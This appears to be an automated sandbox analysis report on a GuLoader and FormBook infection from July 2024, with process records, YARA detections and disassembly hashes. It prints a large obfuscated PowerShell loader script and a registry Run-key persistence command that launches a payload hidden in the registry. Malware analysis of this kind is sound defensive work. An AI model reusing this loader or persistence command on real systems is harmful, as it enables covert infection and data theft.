';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
                    Imagebase:0x950000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:11:37:08
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
                    Imagebase:0x240000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:11:37:32
                    Start date:15/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                    Imagebase:0xa00000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:11
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                    Imagebase:0x240000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:13
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\reg.exe
                    Wow64 process (32bit):true
                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                    Imagebase:0x980000
                    File size:59'392 bytes
                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 00007FFD9B89B0E6 Relevance: .5, Instructions: 474COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2631475341.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b890000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e3daf66289135337ac231937c9e1daa6f553f4d5f26e31fd4c0662dbacd3c81f
                      • Instruction ID: 0742025e5bcaf2b166dbe3edd786616522f42ed340be6a546410565b182f9e65
                      • Opcode Fuzzy Hash: e3daf66289135337ac231937c9e1daa6f553f4d5f26e31fd4c0662dbacd3c81f
                      • Instruction Fuzzy Hash: FAF1A930A09A8E8FEFA8DF68C8557E93BD1FF58310F04426EE85DC7295DB3499458B81
                      Function 00007FFD9B89BE92 Relevance: .5, Instructions: 460COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2631475341.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b890000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cff741f14bacd586b4f8ea856cc2fbcaab4f0e6b8caff37cd4151191f9376f23
                      • Instruction ID: a14906d52b2ecc162011a0aeffccaee306c75d3135a759b11f1ca89355422145
                      • Opcode Fuzzy Hash: cff741f14bacd586b4f8ea856cc2fbcaab4f0e6b8caff37cd4151191f9376f23
                      • Instruction Fuzzy Hash: 8AE1C630A09A8E4FEFA8DF68C8657E97BD1FF58310F04426AE84DC7295DE7499418B81
                      Function 00007FFD9B964B39 Relevance: .5, Instructions: 472COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed14fdd1832a417e6c9cadc6d0a75d14ec40d8a322c02b8ecef2c9df9c659f68
                      • Instruction ID: a1976dfc3984c1cabf87a166a8c68ebe788c850106bebf062ece73f34403311a
                      • Opcode Fuzzy Hash: ed14fdd1832a417e6c9cadc6d0a75d14ec40d8a322c02b8ecef2c9df9c659f68
                      • Instruction Fuzzy Hash: FDE15B31B1EA8E5FEBA6DBA848706B47BD1EF55320B0901BFD45DC72E3DA18AD018740
                      Function 00007FFD9B965C2D Relevance: .4, Instructions: 375COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb6eae8771664a4fd6d06d6dede3beb73a979e394682682301c3aa6ada43defd
                      • Instruction ID: a1799de15a0120e33e84e8bf8f4022f6461fa616081e55c978d2a7857db0a3ac
                      • Opcode Fuzzy Hash: bb6eae8771664a4fd6d06d6dede3beb73a979e394682682301c3aa6ada43defd
                      • Instruction Fuzzy Hash: C8B13832B1EA8D9FEBA6DB6848785B47BD1EF55310B0901FBD05DCB1E3EA18AD048341
                      Function 00007FFD9B961C24 Relevance: .2, Instructions: 195COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9057c7083410421d394f3b0f8d24fb236a62c6ebbe8d5fb8254046dd7b273ea5
                      • Instruction ID: e39c8be17e5ff0fd368e2a7da7fe58d8585abf15d61c50a547a2d00345b1c700
                      • Opcode Fuzzy Hash: 9057c7083410421d394f3b0f8d24fb236a62c6ebbe8d5fb8254046dd7b273ea5
                      • Instruction Fuzzy Hash: 2D513822B2EA5A9FE7B8D66C54316BC77D1EF85324F1911BBD05EC31D2EE18EC018281
                      Function 00007FFD9B964CD7 Relevance: .2, Instructions: 150COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb601d6c837b3f0bd17c22d2b296f7acdb13f45d28d048a114114feb2cb70af8
                      • Instruction ID: eb25979964c852d32db021cfded66ac328b930189a80a47f4a849b480d1d4863
                      • Opcode Fuzzy Hash: bb601d6c837b3f0bd17c22d2b296f7acdb13f45d28d048a114114feb2cb70af8
                      • Instruction Fuzzy Hash: F2410622F2FACA5FF7A6D7A854706B86BD1EF55254B5900BED45CC72E3DE18AC008701
                      Function 00007FFD9B961C70 Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cff796e35343a8061cc9f485f312cba5b5169c2275f16355e7936502d64c56d7
                      • Instruction ID: 02023d79537baec15ea39e2f5fc31e7bf879bebfee565ff6420c51cd516f47a0
                      • Opcode Fuzzy Hash: cff796e35343a8061cc9f485f312cba5b5169c2275f16355e7936502d64c56d7
                      • Instruction Fuzzy Hash: 26315C22B2FA6F9FE77896A9287167C77C1EF81318F5A11BAD01DC71E2ED0CAC014241
                      Function 00007FFD9B965D52 Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8bc80db5e335283abcb91d7fac8da31fa9af6cde3532f9b5c15dcef625bb0119
                      • Instruction ID: a44c587d15f750c6d0682a8af30ac783e088536f703e64fb638d7a3e66063d95
                      • Opcode Fuzzy Hash: 8bc80db5e335283abcb91d7fac8da31fa9af6cde3532f9b5c15dcef625bb0119
                      • Instruction Fuzzy Hash: 9431E722F2FA9E6FEBB6969818795B86BC1EF51254B5900BAD46DCB1E3DD085C004341
                      Function 00007FFD9B893945 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2631475341.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b890000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                      • Instruction ID: b79a6eb36e4b3c93bec01bee87a2e2d7b1e4b7860e7d9f7ae7ca8dfb3c7490a4
                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                      • Instruction Fuzzy Hash: E701677121CB0D4FDB48EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                      Non-executed Functions

                      Function 00007FFD9B963464 Relevance: .6, Instructions: 558COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2632719448.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd9b960000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fae724ea22be19cc1b655091ddc1efe4adb46f78a793127196ef927ebcf54c83
                      • Instruction ID: 3c9f82e5059ff89b9af07da39af1dd46b8326e9910d8e487f8f9391ce5857971
                      • Opcode Fuzzy Hash: fae724ea22be19cc1b655091ddc1efe4adb46f78a793127196ef927ebcf54c83
                      • Instruction Fuzzy Hash: F5F15632B1EBCD9FE7669BAC48655B57BE0EF56310B0901FBD08DC71A3D918A906C341

                      Executed Functions

                      Function 0425EF70 Relevance: .3, Instructions: 281COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aae258a92a90e61d0e0a770984ce9e7e751f1e6901907a52fcfb8b8369ba9eb8
                      • Instruction ID: eb24c45ed5ae719196e0d86ef63f081a7e52d27d7b25ba0545f0a50ab6c85d1b
                      • Opcode Fuzzy Hash: aae258a92a90e61d0e0a770984ce9e7e751f1e6901907a52fcfb8b8369ba9eb8
                      • Instruction Fuzzy Hash: 9AB17F70F10209DFDF10DFA9DA817ADBBF2AF48314F158529D815E7264EB74A846CB81
                      Function 0425F840 Relevance: .3, Instructions: 266COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ba8946291255e5b2be165b192a00767f480f2afd21a84b3b1d76932835753fa
                      • Instruction ID: 35acb244c07184eeac97eb08928448b7bbfb75125b15adba1144ce07d0862c6b
                      • Opcode Fuzzy Hash: 6ba8946291255e5b2be165b192a00767f480f2afd21a84b3b1d76932835753fa
                      • Instruction Fuzzy Hash: 42B18070F1020ADFDB10CFA9DA9579DBBF2BF88314F158529D814E72A4EB74A845CB81
                      Function 07152E50 Relevance: 15.5, Strings: 12, Instructions: 483COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-879563280
                      • Opcode ID: 970db30163970f2b99501319523f631f6101048d95d830a6a3af0a535c1eba89
                      • Instruction ID: 71de97ebe181a67be0cab402113f1acbe9986f81918190e31ea1966a3118e86b
                      • Opcode Fuzzy Hash: 970db30163970f2b99501319523f631f6101048d95d830a6a3af0a535c1eba89
                      • Instruction Fuzzy Hash: 2DF127B1B04309DFCB2E8F39D84466ABBA2AF86254F1484AADC75DF2D1DB31C845C761
                      Function 07158110 Relevance: 13.0, Strings: 10, Instructions: 491COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3512890053
                      • Opcode ID: ee69375714e9b2b08bad297731deb1123952de552cd5dba1440c58736f2cb53a
                      • Instruction ID: e3d8ab3b5ef2888a3efa9396de8763c9f216d35253ec861a5faa150cd7078cd6
                      • Opcode Fuzzy Hash: ee69375714e9b2b08bad297731deb1123952de552cd5dba1440c58736f2cb53a
                      • Instruction Fuzzy Hash: EFF157B0B00206CFCB2D9B79955467ABBE2AFC5210F1484BADD66DF392DB31C845C7A1
                      Function 07151DA8 Relevance: 12.9, Strings: 10, Instructions: 412COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-788909730
                      • Opcode ID: 17ecffa2d2aff9de952f8cd613e9214a1dd3c26078b63ad2fdef2554defb9026
                      • Instruction ID: c5f66b9b4b3dd5a91a7f05c74c3f0b41577a3f0c836c1892ae9fa6c70bad2d02
                      • Opcode Fuzzy Hash: 17ecffa2d2aff9de952f8cd613e9214a1dd3c26078b63ad2fdef2554defb9026
                      • Instruction Fuzzy Hash: ABD138B1B00209DFCB1E9F68C84476ABBE2FF85710F14C46AE9259B391DB31D945CB91
                      Function 071563E8 Relevance: 8.3, Strings: 6, Instructions: 766COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-2822668367
                      • Opcode ID: 9314383069412525fb4fdf51eaafb7a9f746ff9bf03d275551ff72ada851488b
                      • Instruction ID: 1bced42a63f9fdcc94249d7029365dbfa93f3ce1711b4bbcc5706eb8a2e74f41
                      • Opcode Fuzzy Hash: 9314383069412525fb4fdf51eaafb7a9f746ff9bf03d275551ff72ada851488b
                      • Instruction Fuzzy Hash: 4262ADB4E00219CFDB28DB58C955B6EBBB2BF85704F1085A9D8156B395CB32EC81CF91
                      Function 07150D48 Relevance: 7.9, Strings: 6, Instructions: 354COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3669853574
                      • Opcode ID: 7c903c11f1c27695805ba374b266628dcbd2b7b881a18c49e098e59cedd8a9e9
                      • Instruction ID: 556846431b784bbb8d455612584e958d90088d7cdaa0963144096db7fc6264bd
                      • Opcode Fuzzy Hash: 7c903c11f1c27695805ba374b266628dcbd2b7b881a18c49e098e59cedd8a9e9
                      • Instruction Fuzzy Hash: 31B16EB1B0421ADFC72E8FB9C54076ABBA6EF85310F24846BDC159B2D1DB31D841C791
                      Function 07157870 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-2822668367
                      • Opcode ID: 17cddf1a8676631f364a1e4dc5b786293c2802be24559066b257bd5817521339
                      • Instruction ID: 7237b3e17efefeb9dd9000c8c089b7fc3e0dc9e40606141203bd6f25424a3080
                      • Opcode Fuzzy Hash: 17cddf1a8676631f364a1e4dc5b786293c2802be24559066b257bd5817521339
                      • Instruction Fuzzy Hash: C6D18B74A00209CFCB18DB68C956B9EBBB2AF84314F11C469D8116F395CB76EC86CB91
                      Function 07155528 Relevance: 6.0, Strings: 4, Instructions: 1010COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$tP^q$tP^q
                      • API String ID: 0-3859475322
                      • Opcode ID: d37ab7e723f170c9f98721fc5c1dd3cb38cd83ad90f39a272af57a789db67c21
                      • Instruction ID: 989e696ddbb89b7ac619b625b615834fad124714d967afeb1b368a9fa6266ff1
                      • Opcode Fuzzy Hash: d37ab7e723f170c9f98721fc5c1dd3cb38cd83ad90f39a272af57a789db67c21
                      • Instruction Fuzzy Hash: DD829DB4B10205CFDB29CB98C945A6ABBF3AF85304F55C069E815AF395CB32EC45CB91
                      Function 07159FA0 Relevance: 5.6, Strings: 4, Instructions: 569COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-1420252700
                      • Opcode ID: d897e78dd201279169f7a49b844cd2c73bfc50a8469614dede72976c1dc0ac43
                      • Instruction ID: d8e521d135dbbad35e48ccfd3427759afb57fafa9c85a4738be30de2cb215184
                      • Opcode Fuzzy Hash: d897e78dd201279169f7a49b844cd2c73bfc50a8469614dede72976c1dc0ac43
                      • Instruction Fuzzy Hash: D21237B1744215CFCB2A9B688815B6A7FA29FC1310F14C56AD955EF3D1DF32C841CBA1
                      Function 07158790 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q
                      • API String ID: 0-953868773
                      • Opcode ID: 193800e2c638b97bd8cdc3e02721eeb12950cccaa0ef631fd190e2e0fad7a645
